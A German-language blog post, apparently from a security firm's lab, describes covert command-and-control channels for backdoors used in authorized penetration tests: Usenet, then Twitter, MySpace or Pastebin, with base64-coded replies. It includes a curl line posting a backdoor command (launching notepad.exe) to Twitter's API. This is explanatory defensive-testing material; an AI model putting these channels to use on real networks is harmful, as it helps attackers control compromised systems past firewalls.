Klassische Backdoors (Remote Access Tools), wie zum Beispiel BackOrifice oder SubSeven, haben eine Direktverbindung zwischen Client und Server umgesetzt. Da das kompromittierte System den Server auf einen Dienst gebunden und auf dem genutzten Ports eingehende Verbindungen zulassen musste, konnte diese Art der Fernsteuerung einfach erkannt und unterbunden werden (zum Beispiel kein Zulassen eingehender Verbindungen mittels Firewalling).

Im Rahmen unserer Backdoor Tests können wir nicht auf derlei archaische und simple Mechanismen zurückgreifen. Die verschiedenen Sicherheitsmechanismen unserer Kunden sind zu ausgereift und intelligent umgesetzt, so dass wir auf alternative Kommunikationswege ausweichen müssen (einige davon wurden im Labs Post Backdoor Testing optimieren diskutiert).

Wir haben schon verschiedene Implementierungen umgesetzt und die entsprechenden Lösungen in den jeweiligen Projekten nutzen können, um eine Orchestrierung der infizierten Systeme durchführen zu können. Eine exotische Variante bestand darin, die Befehle für die Backdoor sowie die Rückantworten in chiffrierter Weise auf einem öffentlichen Usenet-Server abzulegen (ein ähnliches Prinzip wird mittlerweile auch von kommerziellen Botnets verwendet).

Die grösste Einschränkung dieses Ansatzes ist, dass Firmen oftmals keine Zugriffe über NNTP auf Port tcp/119 zulassen. Das gleiche Prinzip der zentralisierten Kommunikationsschnittstelle lässt sich deshalb am besten in den Webbereich übertragen. So ist es möglich, dass der Datenaustausch über einen populären Webdienst wie Twitter stattfindet. So können Befehle bereitgestellt und die Rückantworten wiederum eingeholt werden; letztere können je nachdem mit base64 codiert werden. Der Zugriff auf Twitter ist dank RSS und der simplen API ohne viel Aufwand möglich. Beispiel einer Mitteilung mit cURL:

curl --basic --user username:password --data status="BACKDOOR_COMMAND
run C:\WINDOWS\system32\notepad.exe" http://twitter.com/statuses/update.xml

Sollten Zugriffe auf einen Dienst blockiert werden, kann in dynamischer Weise auf einen anderen Dienst ausgewichen werden. Hierzu bieten sich soziale Netze wie MySpace oder Anwendungen wie Pastebin an.

About the Author

Marc Ruef has been working in information security since the late 1990s. He is well-known for his many publications and books. The last one called The Art of Penetration Testing is discussing security testing in detail. He is a lecturer at several faculties, like ETH, HWZ, HSLU and IKF. (ORCID 0000-0002-1328-6357)

Links

• http://apiwiki.twitter.com
• http://curl.haxx.se
• http://nopaste.info
• http://www.heise.de/newsticker/Botnetz-Kontrollserver-tarnt-Befehle-als-JPEG-Bild—/meldung/146171
• http://www.myspace.com